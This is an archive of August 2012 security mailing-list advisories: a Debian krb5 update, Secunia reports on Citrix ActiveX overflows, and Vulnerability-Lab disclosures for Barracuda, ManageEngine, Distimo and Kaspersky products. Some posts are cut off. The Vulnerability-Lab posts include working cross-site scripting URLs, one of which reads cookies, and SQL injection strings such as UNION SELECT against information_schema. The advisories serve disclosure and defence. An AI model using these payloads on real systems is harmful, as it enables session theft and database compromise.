[SECURITY] [DSA 2518-1] krb5 security update

2012-08-01 Thread Yves-Alexis Perez
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512


- -------------------------------------------------------------------------
Debian Security Advisory DSA-2518-1   secur...@debian.org
http://www.debian.org/security/ Yves-Alexis Perez
July 31, 2012  http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package: krb5
Vulnerability  : denial of service and remote code execution
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-1014 CVE-2012-1015
Debian Bug : 683429

Emmanuel Bouillon from NCI Agency discovered multiple vulnerabilities in MIT
Kerberos, a daemon implementing the network authentication protocol.

CVE-2012-1014

By sending specially crafted AS-REQ (Authentication Service Request) to
a KDC (Key Distribution Center), an attacker could make it free an
uninitialized pointer, corrupting the heap.  This can lead to process
crash or even arbitrary code execution.

This CVE only affects testing (wheezy) and unstable (sid) distributions.

CVE-2012-1015

By sending specially crafted AS-REQ to a KDC, an attacker could make it
dereference an uninitialized pointer, leading to process crash or even
arbitrary code execution.

In both cases, arbitrary code execution is believed to be difficult to achieve,
but might not be impossible.

For the stable distribution (squeeze), this problem has been fixed in
version 1.8.3+dfsg-4squeeze6.

For the testing distribution (wheezy), this problem has been fixed in
version 1.10.1+dfsg-2.

For the unstable distribution (sid), this problem has been fixed in
version 1.10.1+dfsg-2.

We recommend that you upgrade your krb5 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
-----END PGP SIGNATURE-----



Barracuda Appliances - Validation Filter Bypass Vulnerability

2012-08-01 Thread Vulnerability Lab
Title:
==
Barracuda Appliances - Validation Filter Bypass Vulnerability


Date:
=
2012-07-16


References:
===
http://www.vulnerability-lab.com/get_content.php?id=661


VL-ID:
=
661


Common Vulnerability Scoring System:

5.5


Abstract:
=
The Vulnerability Laboratory Research Team discovered an input validation filter
bypass vulnerability in Barracuda's Network appliance products.


Report-Timeline:

2012-06-09: Researcher Notification & Coordination
2012-06-10: Vendor Notification
2012-07-12: Vendor Response/Feedback
2012-07-14: Vendor Fix/Patch
2012-07-16: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A filter bypass vulnerability is detected in the Barracuda Networks Appliances
Applications. Remote attackers with privileged user accounts can bypass the
application's internal filter & exception-handling. Successful exploitation
of the vulnerability results in dbms (Server) or application (Web) compromise.
Exploitation requires low or medium user interaction & a privileged user
account.

The input filter blocks persistent input attacks with a restriction/filter
exception for double quotes, , frames, scripts & statements. The vulnerability
allows the existing input validation filter & exception handling to be bypassed.

The bug is located when processing to save the url path name (db stored) with
an attached file. The vulnerability allows the path url name parse restriction
to be bypassed, which leads to execution in a second vulnerable bound module
which displays the input as an output listing. The Account MyResource Display
(example listing + input) & Upload File modules are executing the earlier saved
`save` path of url-path/folder, which leads to the bypass of the input
validation filter & exception-handling. The result is the persistent execution
of malicious script code out of the security appliance application context.

The vulnerability allows this method to be bypassed in the following tricky way ...

The url path function saves the context of the input path name (parsed) as a
client side request (GET) via URL. If the request is bound with the file (POST),
which is stored (persistent) and displayed later on the overview listings, the
code is executed unauthorized out of the security application context
(persistent|server-side).


Vulnerable Module(s):
[+] MyResource, File System & File Upload Output/Input
- Input Validation Filter Restriction & Listing

NOTE: The vulnerability is also located on different other security appliances 
on all resource listings or file uploads with url path save.


Proof of Concept:
=
The vulnerability can be exploited by local low privileged user accounts with
medium or high required user interaction.
For demonstration or to reproduce ...

Manually ...

1. Log in to, for example, the SSL VPN appliance
2. Switch over to the MyResources File System
3. Open via Tamper the following url ...
fileSystem.do?ActionTarget=listpath=smb/random folder/
4. Now save the path and switch to the new folder
5. The setting of the path has been implemented automatically. Change the path
to your script code after it has been parsed.
6. Now, after the save, switch to the upload files function. Upload any random
file which is bound to the malicious title.
7. Save the file and the code is executed in the main index of the preview in
myresources.

a href=?launchId=l7e68d5startRow=0
path=smb%2F%22%3E%3C[PERSISTENT SCRIPT CODE 
EXECUTION!]+%3CpageSize=25sortReverse=
falsesortName=fileSystem.size
amp;amp;actionTarget=list class=columnHeaderSize/a
/td

... or

spana 
href=fileSystem.do?actionTarget=listlaunchId=l7e68d5path=smb/Sales%20FolderSales
 Folder
/a / a 
href=fileSystem.do?actionTarget=listlaunchId=l7e68d5path=smb/Sales%20Folder/Testing%20from%20Tri%20Opt
Testing from Tri Opt/a /#8203;#8203;#8203;#8203;#8203; a 
href=fileSystem.do?actionTarget=list
launchId=l7e68d5path=smb/Sales%20Folder/
Testing%20from%20Tri%20Opt/%22%3E%3C[PERSISTENT SCRIPT CODE INJECT VIA 
PATH%22%29%20%3C
#8203;#8203;#8203;#8203;#8203;[PERSISTENT SCRIPT CODE EXECUTION!]' 
= a= /  /span/div


Reference(s):
../video-poc.wmv


Solution:
=
The vulnerability can be fixed by parsing the second input request of the file
upload function next to the display of the myresource listing.
To fix the issue completely it is also required to parse the path url request,
which allows the context to be included but not executed.

2012-07-14: Vendor Fix/Patch by Barracuda Networks


Risk:
=
The security risk of the input validation filter bypass vulnerability is 
estimated as high(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this 

Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities

2012-08-01 Thread Vulnerability Lab
Title:
==
Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities


Date:
=
2012-07-16


References:
===
http://vulnerability-lab.com/get_content.php?id=561

Barracuda Networks Security ID: BNSEC-278


VL-ID:
=
561


Common Vulnerability Scoring System:

3


Introduction:
=
The Barracuda SSL VPN is an integrated hardware and software solution enabling 
secure, clientless remote 
access to internal network resources from any Web browser. Designed for remote 
employees and road warriors, 
the Barracuda SSL VPN provides comprehensive control over file systems and 
Web-based applications requiring 
external access. The Barracuda SSL VPN integrates with third-party 
authentication mechanisms to control user 
access levels and provides single sign-on. 

Barracuda SSL VPN   

* Enables access to corporate intranets, file systems or other Web-based 
applications
* Tracks resource access through auditing and reporting facilities
* Scans uploaded files for viruses and malware
* Leverages multi-factor, layered authentication mechanisms, including RSA 
SecurID and VASCO tokens
* Integrates with existing Active Directory and LDAP directories
* Utilizes policies for granular access control framework
* Supports any Web browser on PC or Mac

(Copy of the Vendor Homepage: 
http://www.barracudanetworks.com/ns/products/sslvpn.php)


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Web
Vulnerabilities in the Barracuda SSL VPN 680 appliance application.


Report-Timeline:

2012-06-09: Researcher Notification & Coordination
2012-06-10: Vendor Notification
2012-07-12: Vendor Response/Feedback
2012-07-14: Vendor Fix/Patch
2012-07-16: Public Disclosure


Status:

Published


Affected Products:
==
Barracuda Networks
Product: SSL VPN Appliance v680 - 2.2.2.115


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple non-persistent cross site scripting vulnerabilities are detected in the
Barracuda SSL VPN 680 v2.2.2.115 appliance application.
The vulnerability allows remote attackers to hijack website customer, moderator
or admin sessions with high required user interaction. The bugs are located in
the fileSystem.do, showUserResourceCategories.do & launchAgent.do files with the
bound vulnerable policyLaunching, resourcePrefix, path & return-To parameters.
Successful exploitation can result in account theft, phishing & client-side
content request manipulation.

Vulnerable Module(s):
[+] 
showUserResourceCategories.domessageResourcesKey=resourceCategory
[+] 
fileSystem.do?launchId=l52ca6dactionTarget=listpath=
[+] launchAgent.do

Vulnerable Parameter(s):
[+] policyLaunching & resourcePrefix
[+] listpath
[+] return-To


Proof of Concept:
=
The client side cross site scripting vulnerabilities can be exploited by remote
attackers with medium or high required user interaction.
For demonstration or to reproduce ...

1.1
https://sslvpn.[SERVER]/resourceList.do?form=resourceCategoriesFormreadOnly=testpath=
%2FshowUserResourceCategories.domessageResourcesKey=resourceCategoryactionPath=[NON-PERSISTENT
 SCRIPT CODE!]


1.2
https://sslvpn.[SERVER]/[FILE].do?[VALUE #1]=l52ca6d[VALUE #2]=[VALUE 
#3][PATH LISTING]=smb/Sales%20Folder/Opt/[NON-PERSISTENT SCRIPT CODE!]

PoC:
https://sslvpn.[SERVER]/fileSystem.do?launchId=l52ca6dactionTarget=listpath=smb/Sales%20Folder/Testing
%20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C


1.3
https://sslvpn.[SERVER]/launchAgent.do?launchId=l3ce418returnTo=[NON-PERSISTENT
 SCRIPT CODE!]


Solution:
=
2012-07-14: Vendor Fix/Patch by Barracuda Networks


Risk:
=
The security risk of the non-persistent cross site scripting vulnerabilities
is estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any 

ME Application Manager 10 - Multiple Web Vulnerabilities

2012-08-01 Thread Vulnerability Lab
Title:
==
ME Application Manager 10 - Multiple Web Vulnerabilities


Date:
=
2012-07-04


References:
===
http://www.vulnerability-lab.com/get_content.php?id=627


VL-ID:
=
627


Common Vulnerability Scoring System:

7.2


Introduction:
=
ManageEngine Applications Manager is a server and application performance 
monitoring software that helps businesses 
ensure high availability and performance for their business applications by 
ensuring servers and applications have 
high uptime. The application performance management capability includes server 
monitoring, application server 
monitoring, database monitoring, web services monitoring, virtualization 
monitoring, cloud monitoring and an array of 
other application management capability that will help IT administrators manage 
their resources effectively.

(Copy of the Vendor Homepage: 
http://www.manageengine.com/products/applications_manager )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Vulnerabilities
in ManageEngine's Application Manager v10 b10500.


Report-Timeline:

2012-06-23: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Manage Engine
Product: Application Manager v10.0


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

1.1
Multiple SQL Injection vulnerabilities are detected in ManageEngine's
Application Manager v10 b10500.
The vulnerability allows an attacker (remote) or local low privileged user
account to inject/execute own sql commands on the affected application dbms
without user interaction. The vulnerabilities are located in the mypage.do or
rca.jsp module(s) and the bound vulnerable parameters selectedpageid &
resourceid. Successful exploitation of the vulnerability results in dbms &
application compromise.

Vulnerable Module(s):
[+] MyPage.do
[+] RCA.jsp

Vulnerable Parameter(s):
[+] selectedpageid
[+] resourceid


1.2
Multiple non-persistent cross site scripting vulnerabilities are detected in
ManageEngine's Application Manager v10 b10500.
The vulnerability allows remote attackers to hijack website customer, moderator
or admin sessions with medium or high required user interaction or a local low
privileged user account. The vulnerabilities are located in the showCustom.do,
MyPage.do, ThresholdActionConfiguration.jsp, showresource.do or
ProcessTemplates.do files with the bound vulnerable parameters redirectto, type,
attributeToSelect, templatetype, forpage & monitorname. Successful exploitation
can result in account theft, phishing & client-side content request
manipulation.

Vulnerable Module(s):
[+] showCustom.do
[+] MyPage.do
[+] ThresholdActionConfiguration.jsp
[+] showresource.do
[+] ProcessTemplates.do

Vulnerable Parameter(s):
[+] redirectto
[+] type
[+] attributeToSelect
[+] templatetype
[+] forpage
[+] monitorname


Proof of Concept:
=
1.1
The blind sql injection vulnerabilities can be exploited by remote attackers
without user interaction or a privileged user account.
For demonstration or to reproduce ...

PoC:
http://appmanager.127.0.0.1:1338/MyPage.do?method=viewDashBoardforpage=1;
addNewTab=trueselectedpageid=1017+AND+1=1--%20-[BLIND SQL-INJECTION]

http://appmanager.127.0.0.1:1338/jsp/RCA.jsp?resourceid=1624attributeid=1900alertconfigurl=
%2FshowActionProfiles.do%3Fmethod%3DgetResourceProfiles%26admin%3Dtrue%26all%3Dtrue%26resourceid%3D-
1624'+AND+substring(version(),1)=4[BLIND SQL-INJECTION]
Sat%20Jun%2023%202012%2000:47:25%20GMT+0200%20(EET)


1.2
The non-persistent cross site scripting vulnerabilities can be exploited by
remote attackers with medium or high required user interaction.
For demonstration or to reproduce ...

http://appmanager.127.0.0.1:1338/showCustom.do?resourcename=nulltype=EC2Instanceoriginal_type=EC2Instancename=moname=i-
3a96b773tabId=1baseid=1015resourceid=1744monitorname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3Cmethod=showDataforConfs

http://appmanager.127.0.0.1:1338/MyPage.do?method=viewDashBoardforpage=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL
%22%29%20%3CaddNewTab=trueselectedpageid=1014

http://appmanager.127.0.0.1:1338/jsp/ThresholdActionConfiguration.jsp?resourceid=1055attributeIDs=101;
attributeToSelect=101redirectto=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C

http://appmanager.127.0.0.1:1338/showresource.do?resourceid=1189type=%22%3E%3Ciframe%20src=

Distimo Monitor 6.0 - Multiple Cross Site Vulnerabilities

2012-08-01 Thread Vulnerability Lab
Title:
==
Distimo Monitor 6.0 - Multiple Cross Site Vulnerabilities


Date:
=
2012-07-05


References:
===
http://www.vulnerability-lab.com/get_content.php?id=631


VL-ID:
=
631


Common Vulnerability Scoring System:

2


Introduction:
=
Distimo Monitor allows developers to track their daily download and revenue
figures from all app stores in one convenient place. View application rankings
in all countries, and benchmark your application(s) versus the competition and
the rest of the market. No code-insert in the developer application is
required. Distimo provides device manufacturers, carriers and developers with
the best insight into the mobile app store market, in order to steer their app
strategy. Distimo Monitor is the free cross-platform app store monitoring tool
for developers.

(Copy of the Vendor Homepage: http://www.distimo.com/products/ )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Cross Site 
Scripting vulnerabilities in the Distimo Monitor v6.0 application.


Report-Timeline:

2012-07-01: Researcher Notification & Coordination
2012-07-02: Vendor Notification
2012-07-04: Vendor Response/Feedback
2012-07-05: Vendor Fix/Patch
2012-07-05: Public or Non-Public Disclosure



Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple non-persistent cross site scripting vulnerabilities are detected in
the Distimo Monitor v6.0 application.
The vulnerability allows remote attackers to hijack website customer, moderator
or admin sessions with medium or high required user interaction or a local low
privileged user account. The bugs are located in the Downloads & Map or
Revenue & Date modules with the bound vulnerable parameters metric,
application & date. Successful exploitation can result in account theft,
client side phishing & client-side content request manipulation. Exploitation
requires medium or high user interaction & no privileged application user
account.

Vulnerable Module(s):
[+] Downloads & Map
[+] Revenue & Date


Vulnerable Parameter(s):
[+] metric
[+] country
[+] application


Proof of Concept:
=
The non-persistent cross site scripting vulnerabilities can be exploited by
remote attackers with medium or high required user interaction & without a
privileged user account. For demonstration or to reproduce ...

PoC:

https://monitor.127.0.0.1:1338/downloads/date/metric:1/country:29/application:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/appstore:1

https://monitor.127.0.0.1:1338/downloads/date/metric:1/country:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/application:99/appstore:1

https://monitor.127.0.0.1:1338/downloads/map/metric:%3E%22%3Ciframe%20src=http://vuln-lab.com%3E+%3E%22%3Ciframe%20src=http://vuln-lab.com%3E

https://monitor.127.0.0.1:1338/revenue/date/application:99/country:%3E%22%3Ciframe%20src=http://vuln-lab.com%3E%3E%22%3Ciframe%20src=http://vuln-lab.com%3E

https://monitor.127.0.0.1:1338/revenue/date/application:%3E%22%3Ciframe%20src=http://vuln-lab.com%3E%3E%22%3Ciframe%20src=http://vuln-lab.com/country:30




Review:  Revenue

div id=savePresetPopup class=bigButton floatl style=margin: 0px 0px 0px 
12px;img src=/img/add.png Save View/div
/divdiv id=chartPageTabsa href=/revenue/date/application:%3E 
iframe= src=http:/www.vuln-lab.com
iframe src=http:/www.vuln-lab.com heigh=800 width=1000/country:30 
class=activeBy Date/aa 
href=/revenue/map/application:[NON PERSISTENT SCRIPT CODE INJECT][NON 
PERSISTENT SCRIPT CODE INJECT2] 
width=1000 heigh=800/country:30 class=By Country or Continent/a/div

/div

Review: Application

/divdiv id=chartPageTabsa 
href=/downloads/date/metric:1/country:29/application:
[NON PERSISTENT SCRIPT CODE INJECT]) /appstore:1 class=activeBy Date/a
a href=/downloads/map/metric:1/country:29/application:[NON PERSISTENT 
SCRIPT CODE INJECT]) 
/appstore:1 class=By Country or Continent/a/div
/div

Review: Country

div id=savePresetPopup class=bigButton floatl style=margin: 0px 0px 0px 
12px;img src=/img/add.png / Save View/div
/divdiv id=chartPageTabsa 
href=/downloads/date/metric:1/country:29/application:[NON PERSISTENT SCRIPT 
CODE INJECT]) 
/appstore: class=activeBy Date/aa 
href=/downloads/map/metric:1/country:29/application:
[NON PERSISTENT SCRIPT CODE INJECT]) /appstore: class=By Country or 
Continent/a/div   
/div


Solution:
=
Update to Distimo Monitor v6.1 (https://monitor.distimo.com/support/releases)

Vulnerable Version(s): Distimo Monitor v6.0


Risk:
=
The security risk of the non persistent cross site scripting vulnerabilities 
are estimated as 

ME Mobile Application Manager v10 - SQL Vulnerabilities

2012-08-01 Thread Vulnerability Lab
Title:
==
ME Mobile Application Manager v10 - SQL Vulnerabilities


Date:
=
2012-07-04


References:
===
http://www.vulnerability-lab.com/get_content.php?id=628


VL-ID:
=
628


Common Vulnerability Scoring System:

8.1


Introduction:
=
ManageEngine Mobile Applications Manager is a server and application 
performance monitoring software that helps businesses 
ensure high availability and performance for their business applications by 
ensuring servers and applications have 
high uptime. The application performance management capability includes server 
monitoring, application server 
monitoring, database monitoring, web services monitoring, virtualization 
monitoring, cloud monitoring and an array of 
other application management capability that will help IT administrators manage 
their resources effectively.

Note: The mobile version 10 is compatible with BlackBerry, iPhone & Android
smartphones with IE, Safari or Firefox browser.

(Copy of the Vendor Homepage: 
http://www.manageengine.com/products/applications_manager )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple SQL Injection
Vulnerabilities in ManageEngine's Mobile Application Manager v10.


Report-Timeline:

2012-06-23: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Manage Engine
Product: Mobile Application Manager v10.0


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

Multiple SQL Injection vulnerabilities are detected in ManageEngine's Mobile
Application Manager v10.
The vulnerability allows an attacker (remote) or local low privileged user
account to inject/execute own sql commands on the affected application dbms
without user interaction. The vulnerabilities are located in the DetailsView.do
or Search.do module(s) and the bound vulnerable parameters showMGDetailsgroupId
& viewName. Successful exploitation of the vulnerabilities results in dbms &
application compromise via sql injection attack.

Vulnerable Module(s):
[+] DetailsView.do
[+] Search.do

Vulnerable Parameter(s):
[+] showMGDetailsgroupId
[+] viewName


Proof of Concept:
=
The sql injection vulnerabilities in the mobile manager application can be
exploited by remote attackers without user interaction.
For demonstration or to reproduce ...

PoC:
http://appmanager.127.0.0.1:1339/mobile/DetailsView.do?method=showMGDetailsgroupId=10003645+UnION+
SelEct+group_concat(table_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+
WHERE+table_schema=database()--%20-

http://appmanager.127.0.0.1:1339/mobile/Search.do?method=mobileSearch
requestid=[SQL INJECTION]mobileSearchPageviewName=Search


Risk:
=
The security risk of the sql injection vulnerabilities is estimated as high.


Credits:

Vulnerability Laboratory [Research Team]  - Ibrahim El-Sayed [storm] 
(st...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 

Kaspersky PM 5.0.0.164 - Software Filter Vulnerability

2012-08-01 Thread Vulnerability Lab
Title:
==
Kaspersky PM 5.0.0.164 - Software Filter Vulnerability


Date:
=
2012-07-12


References:
===
http://www.vulnerability-lab.com/get_content.php?id=612


VL-ID:
=
612


Common Vulnerability Scoring System:

3


Introduction:
=
Kaspersky Password Manager is an indispensable tool for the active Internet 
user. It fully automates 
the process of entering passwords and other data into websites and saves the 
user going to the trouble 
of creating and remembering multiple passwords. When you use Kaspersky Password 
Manager to log in, you 
can rest assured that your data is safe. The software creates exceptionally 
strong passwords and prevents 
your login information from being stolen. All confidential data is encrypted 
and kept in a dedicated database 
on your computer. Kaspersky Password Manager makes your web experience safer, 
quicker and more convenient.

(Copy of the Vendor Homepage: www.kaspersky.com/us/kaspersky-password-manager )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a software filter &
validation vulnerability in Kaspersky's Password Manager v5.0.0.164.


Report-Timeline:

2012-07-12: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Kaspersky Labs
Product: Kaspersky Password Manager v5.0.0.164 & older versions


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

A software filter & validation vulnerability is detected in Kaspersky's Password
Manager v5.0.0.164 software.
The bug allows an attacker (local) to implement/inject malicious script code
when processing an export of a manipulated Kaspersky Password Manager database.
The vulnerability is located in the validation of the html/xml export
function/module & the bound vulnerable name, domain, url, comment (listing)
parameters. URLs of entries are embedded in the exported HTML file without
encoding XML special characters; when the URL (domain) field of an entry
contains malicious script code, this will be executed when the exported HTML
file is opened in a browser.

Exploitation of the vulnerability requires a manipulated url with malicious
script code, a logging server with chmod 777, a listing file (random) & a
Kaspersky PM v5.0.0.164 user. The bug is injected on the remote way (Autofill
Engine), affects the local validation (html/xml) on exports and changes the
technique back when remotely transferring the password lists. The injection of
the malicious url/domain context can be done via automatic imports/plugins
(KPM AutoFill Engine v5.0.0.164) as victim or manually (reproduce) by including.
Successful exploitation of the vulnerability leads to stable (persistent)
context manipulation, persistent phishing, execution of malware or stealing of
plain password lists. Medium user interaction is required to exploit the
vulnerability.


Normally Kaspersky Password Manager exports the html & xml backup with a secure
clean template like ...

<tbody><tr class="MySplitterRow"><td colspan="2"> </td></tr>
<tr class="MyAccountNameRow">
 <td align="right" width="150px">Name des Benutzerkontos: </td>
 <td><b>test1</b></td>
</tr>
<tr><td align="right" valign="top">Link: </td>
<td valign="top">test4</td></tr>
<tr class="MySplitterRowLight"><td colspan="2"></td></tr>
<tr><td align="right" valign="top">Benutzername: <br>Kennwort: </td><td
valign="top">test2<br>test3</td></tr>
<tr class="MySplitterRowLight"><td colspan="2"></td></tr>
<tr><td align="right" valign="top">Kommentar</td><td
valign="top">test5</td></tr>
<tr class="MySplitterRow"><td colspan="2"> </td></tr>
<tr class="MySplitterRowWhite"><td colspan="2"> </td></tr>
</tbody></table></body></html>

The local attacker manipulates the database with malicious strings (script code)
in the category item profile name input fields.
Kaspersky Password Manager generates the clean html or xml template, but after
the persistent script code is injected into the database profile name items,
the persistent code is executed directly from the clean exported xml or html
template file.

tr class=``MyAccountNameRow``
 td align=``right`` width=``150px``Name des Benutzerkontos: /td
 tdb``iframe src=``http://vulnerability-lab.com`` onload=alert(`VL`) 
=`` b=``/td
/tr


Vulnerable Section(s):
[+] Export & Import - Database & Categories

Vulnerable Module(s):
[+] HTML & XML


Vulnerable Parameter(s):
[+] Benutzername
[+] Kommentar
[+] Vorname, Zweiter Vorname & Nachname
[+] Email, Stadt & Adresse
[+] Abteilung, Beruf & Webseite
[+] Link/Website/URL



Exploitation (Remote > Local > Local > Remote) Scenario:

1. Remote
Attacker is sending the victim a manipulated login page (MITM/Browser or as 
Link) with script 

Secunia Research: Citrix Access Gateway Plug-in for Windows nsepacom ActiveX Control Integer Overflow

2012-08-01 Thread Secunia Research
== 

 Secunia Research 01/08/2012

  - Citrix Access Gateway Plug-in for Windows -
  - nsepacom ActiveX Integer Overflow Vulnerability -

== 
Table of Contents

Affected Software............................................................1
Severity.....................................................................2
Vendor's Description of Software.............................................3
Description of Vulnerability.................................................4
Solution.....................................................................5
Time Table...................................................................6
Credits......................................................................7
References...................................................................8
About Secunia................................................................9
Verification................................................................10

== 
1) Affected Software 

* Citrix Access Gateway Plug-in for Windows version 9.3.49.5.

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  From remote

== 
3) Vendor's Description of Software 

Citrix Access Gateway Plug-in is client software for Windows XP and
Windows Vista (32-bit) that enables secure connectivity through
Access Gateway, Enterprise Edition.

Product Link:
http://www.citrix.com/site/ss/downloads/details.asp?downloadId=1535878&productId=15005

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Citrix Access
Gateway Plug-in for Windows, which can be exploited by malicious
people to compromise a user's system.

The vulnerability is caused by an integer overflow error in the 
nsepacom ActiveX control (nsepa.exe) when processing HTTP responses
based on the request via the StartEpa() method. This can be 
exploited to cause a heap-based buffer overflow via a specially
crafted Content-Length HTTP response header.

Successful exploitation may allow execution of arbitrary code.

== 
5) Solution 

No official solution is currently available.

== 
6) Time Table 

19/07/2011 - Vendor notified.
21/07/2011 - Vendor response.
20/01/2012 - Requested status update.
08/02/2012 - Vendor response, fix not scheduled.
09/05/2012 - Requested status update.
09/05/2012 - Vendor response, fix scheduled for June.
03/07/2012 - Requested status update.
21/07/2012 - Vendor response, fix delayed.
01/08/2012 - Public disclosure.

== 
7) Credits 

Discovered by Dmitriy Pletnev, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2011-2593 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2012-26/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


Secunia Research: Citrix Access Gateway Plug-in for Windows nsepacom ActiveX Control Buffer Overflow

2012-08-01 Thread Secunia Research
== 

 Secunia Research 01/08/2012

 - Citrix Access Gateway Plug-in for Windows -
 - nsepacom ActiveX Buffer Overflow Vulnerability -

== 
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

* Citrix Access Gateway Plug-in for Windows version 9.3.49.5.

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  From remote

== 
3) Vendor's Description of Software 

Citrix Access Gateway Plug-in is client software for Windows XP and
Windows Vista (32-bit) that enables secure connectivity through
Access Gateway, Enterprise Edition.

Product Link:
http://www.citrix.com/site/ss/downloads/details.asp?downloadId=1535878&productId=15005

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Citrix Access
Gateway Plug-in for Windows, which can be exploited by malicious
people to compromise a user's system.

The vulnerability is caused by a boundary error in the nsepacom
ActiveX control (nsepa.exe) when processing HTTP responses based on
the request via the StartEpa() method. This can be exploited to 
cause a heap-based buffer overflow via an overly long CSEC HTTP
response header.

Successful exploitation allows execution of arbitrary code.

== 
5) Solution 

No official solution is currently available.

== 
6) Time Table 

19/07/2011 - Vendor notified.
21/07/2011 - Vendor response.
20/01/2012 - Requested status update.
08/02/2012 - Vendor response, fix not scheduled.
09/05/2012 - Requested status update.
09/05/2012 - Vendor response, fix scheduled for June.
03/07/2012 - Requested status update.
21/07/2012 - Vendor response, fix delayed.
01/08/2012 - Public disclosure.

== 
7) Credits 

Discovered by Dmitriy Pletnev, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2011-2592 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

